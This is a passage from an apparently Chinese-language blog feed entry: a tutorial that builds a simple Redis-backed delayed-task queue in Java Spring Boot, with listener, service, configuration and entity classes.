class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 定时任务监听类,用于不停获取队列里的任务</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">DelayServiceListener</span> <span class="keyword">extends</span> <span class="title">Thread</span></span>{</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> Logger logger = LoggerFactory.getLogger(getClass());</span><br><span class="line"></span><br><span class="line">Map<String, Integer> countStore = <span class="keyword">new</span> HashMap<>();</span><br><span class="line">DelayService delayService;</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">DelayServiceListener</span><span class="params">(DelayService delayService)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.delayService=delayService;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">run</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">while</span> (<span class="keyword">true</span>) {</span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line"><span class="comment">//阻塞,等待任务添加进队列</span></span><br><span class="line">DelayedInfo info = delayService.take();</span><br><span class="line"><span class="keyword">if</span> (delayService.delayProcess(info)) {</span><br><span class="line"><span class="comment">// 执行完成,删除任务</span></span><br><span class="line">delayService.remove(info);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"><span class="comment">// 记录重试次数,超时3次不再重复执行</span></span><br><span class="line">Integer count = countStore.get(info.getOrderId());</span><br><span class="line"><span class="keyword">if</span> (count == <span class="keyword">null</span>) {</span><br><span class="line">count = <span class="number">1</span>;</span><br><span class="line">countStore.put(info.getOrderId(), count);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"><span class="keyword">if</span> (count < <span class="number">3</span>) {</span><br><span class="line">countStore.put(info.getOrderId(), ++count);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">countStore.remove(info.getOrderId());</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (count < <span class="number">3</span>) {</span><br><span class="line"><span class="comment">// 未执行完成,等待下一轮</span></span><br><span class="line">delayService.add(info.getOrderId(), System.currentTimeMillis(), info.getTimeOut());</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">} <span class="keyword">catch</span> (Exception e) {</span><br><span class="line">logger.error(<span class="string">"DelayService执行出错!"</span>, e);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h4><span id="创建定时任务业务处理类">创建定时任务业务处理类</span></h4><p>在这里处理你的业务逻辑,代码示例:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 延时任务</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">@Service</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">MyDelayService</span> <span class="keyword">extends</span> <span class="title">DelayService</span></span>{</span><br><span class="line"></span><br><span class="line"><span class="meta">@Autowired</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">MyDelayService</span><span class="params">(StringRedisTemplate redisTemplate)</span> </span>{</span><br><span class="line"><span class="keyword">super</span>(redisTemplate);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">delayProcess</span><span class="params">(DelayedInfo info)</span> </span>{</span><br><span class="line">logger.info(<span class="string">"执行延时任务,订单编号:{}"</span>,info.getOrderId());</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4><span id="最后一个添加配置类">最后一个!添加配置类</span></h4><p>我们需要在spring启动完成后执行扫描代码,因此还需要一个配置类</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Configuration</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">DelayTaskConfig</span> <span class="keyword">implements</span> <span class="title">ApplicationListener</span><<span class="title">ApplicationReadyEvent</span>></span>{</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Autowired</span></span><br><span class="line"> RedisTemplate<String, String> redisTemplate;</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">onApplicationEvent</span><span class="params">(ApplicationReadyEvent event)</span> </span>{</span><br><span class="line">ApplicationContext applicationContext = event.getApplicationContext();</span><br><span class="line"> <span class="keyword">if</span> (applicationContext != <span class="keyword">null</span>) {</span><br><span class="line"> MyDelayService MyDelayService = applicationContext.getBean(MyDelayService.class);</span><br><span class="line"> <span class="comment">//扫描保存在redis里的定时任务</span></span><br><span class="line"> MyDelayService.redisScan(此处为自定的订单类型);</span><br><span class="line"> <span class="keyword">new</span> DelayServiceListener(MyDelayService).start();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>大功造成,在代码中动态添加定时任务的用法如下,只需注入并调用add方法即可:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Autowired</span></span><br><span class="line">MyDelayService MyDelayService;</span><br><span class="line"></span><br><span class="line"><span class="comment">//在你的代码中调用添加定时任务方法</span></span><br><span class="line">MyDelayService.add(订单编号, 订单类型,延时执行时间,单位为秒);</span><br></pre></td></tr></table></figure><p>最后redis依赖别忘记加了哦</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">dependency</span>></span></span><br><span class="line"><span class="tag"><<span class="name">groupId</span>></span>org.springframework.boot<span class="tag"></<span class="name">groupId</span>></span></span><br><span class="line"><span class="tag"><<span class="name">artifactId</span>></span>spring-boot-starter-data-redis<span class="tag"></<span class="name">artifactId</span>></span></span><br><span class="line"><span class="tag"><<span class="name">exclusions</span>></span></span><br><span class="line"><span class="tag"><<span class="name">exclusion</span>></span></span><br><span class="line"><span class="tag"><<span class="name">groupId</span>></span>org.springframework.boot<span class="tag"></<span class="name">groupId</span>></span></span><br><span class="line"><span class="tag"><<span class="name">artifactId</span>></span>spring-boot-starter<span class="tag"></<span class="name">artifactId</span>></span></span><br><span class="line"><span class="tag"></<span class="name">exclusion</span>></span></span><br><span class="line"><span class="tag"><<span class="name">exclusion</span>></span></span><br><span class="line"><span class="tag"><<span class="name">groupId</span>></span>org.slf4j<span class="tag"></<span class="name">groupId</span>></span></span><br><span class="line"><span class="tag"><<span class="name">artifactId</span>></span>slf4j-api<span class="tag"></<span class="name">artifactId</span>></span></span><br><span class="line"><span class="tag"></<span class="name">exclusion</span>></span></span><br><span class="line"><span class="tag"></<span class="name">exclusions</span>></span></span><br><span class="line"><span class="tag"></<span class="name">dependency</span>></span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="重要的前言"><a href="#重要的前言" class="headerlink" title="重要的前言"></a>重要的前言</h1><p> 先说说为什么重复造轮子,当时的情况是只需要一个简单的延时任务,做到不丢失即可,引入分布式定时任务框架又觉得太重,因此手动造了个基于redis的简单可靠定时任务。</p>
<p>适用场景,此种做法在单机部署情况下是肯定没问题的,在分布式部署情况下可能会出现问题,比如同一个服务同时重启了,又刚好同时读取redis中的定时任务,还刚好就在那几十毫秒的情况下没有检测到redis锁,此时会导致任务重复读取。</p>
<p>因此,在定时任务的代码中需要容忍可能会出现重复执行的情况,一般做法是用订单状态判断,所以如果不是非常严格的场景,这套做法是够用了 (复杂的定时任务建议用QUARTZ)。</p>
<h1 id="上代码"><a href="#上代码" class="headerlink" title="上代码"></a>上代码</h1><p> 废话结束,接下来上代码,首先创建定时任务的实体类,保存定时任务执行时间、订单ID、订单类型等。</p>
<h4 id="定时任务实体类"><a href="#定时任务实体类" class="headerlink" title="定时任务实体类"></a>定时任务实体类</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">DelayedInfo</span> <span class="keyword">implements</span> <span class="title">Delayed</span> </span>&#123;</span><br><span class="line"> <span class="keyword">private</span> String orderId;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 任务类型(订单类型)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> Integer delayType;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 当前时间</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> currentTime;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 任务执行时间=当前时间 + 延时任务执行时间</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> startTime;</span><br><span class="line"> <span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 延时时间,单位为秒</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">long</span> timeOut;</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">()</span></span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">(String orderId, <span class="keyword">long</span> currentTime, <span class="keyword">long</span> timeOut)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> <span class="keyword">this</span>.startTime = currentTime + timeOut * <span class="number">1000l</span>;</span><br><span class="line"> <span class="keyword">this</span>.timeOut=timeOut;</span><br><span class="line"> <span class="keyword">this</span>.delayType=Contract.ORDER_TYPE_CHARGE;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="title">DelayedInfo</span><span class="params">(String orderId, <span class="keyword">long</span> currentTime, <span class="keyword">long</span> timeOut,<span class="keyword">int</span> orderType)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> <span class="keyword">this</span>.startTime = currentTime + timeOut * <span class="number">1000l</span>;</span><br><span class="line"> <span class="keyword">this</span>.timeOut=timeOut;</span><br><span class="line"> <span class="keyword">this</span>.delayType=orderType;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getDelay</span><span class="params">(TimeUnit unit)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> unit.convert(startTime - System.currentTimeMillis(), unit);</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">compareTo</span><span class="params">(Delayed other)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">if</span> (other == <span class="keyword">this</span>)&#123;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">if</span>(other <span class="keyword">instanceof</span> DelayedInfo)&#123;</span><br><span class="line"> DelayedInfo otherRequest = (DelayedInfo)other;</span><br><span class="line"> <span class="keyword">long</span> otherStartTime = otherRequest.getStartTime();</span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">int</span>)(<span class="keyword">this</span>.startTime - otherStartTime);</span><br><span class="line"> &#125;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">getOrderId</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> orderId;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setOrderId</span><span class="params">(String orderId)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.orderId = orderId;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getStartTime</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> startTime;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setStartTime</span><span class="params">(<span class="keyword">long</span> startTime)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.startTime = startTime;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getCurrentTime</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> currentTime;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setCurrentTime</span><span class="params">(<span class="keyword">long</span> currentTime)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.currentTime = currentTime;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">toString</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> JacksonUtil.toJSon(<span class="keyword">this</span>);</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">long</span> <span class="title">getTimeOut</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> timeOut;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setTimeOut</span><span class="params">(<span class="keyword">long</span> timeOut)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.timeOut = timeOut;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> Integer <span class="title">getDelayType</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">return</span> delayType;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setDelayType</span><span class="params">(Integer delayType)</span> </span>&#123;</span><br><span class="line"> <span class="keyword">this</span>.delayType = delayType;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其中delayType、OrderType就是订单类型的枚举标识,可自己定义标识。</p></summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="JAVA" scheme="https://reiner.host/tags/JAVA/"/>
<category term="SringBoot" scheme="https://reiner.host/tags/SringBoot/"/>
<category term="Redis" scheme="https://reiner.host/tags/Redis/"/>
<category term="定时任务" scheme="https://reiner.host/tags/%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1/"/>
</entry>
</feed>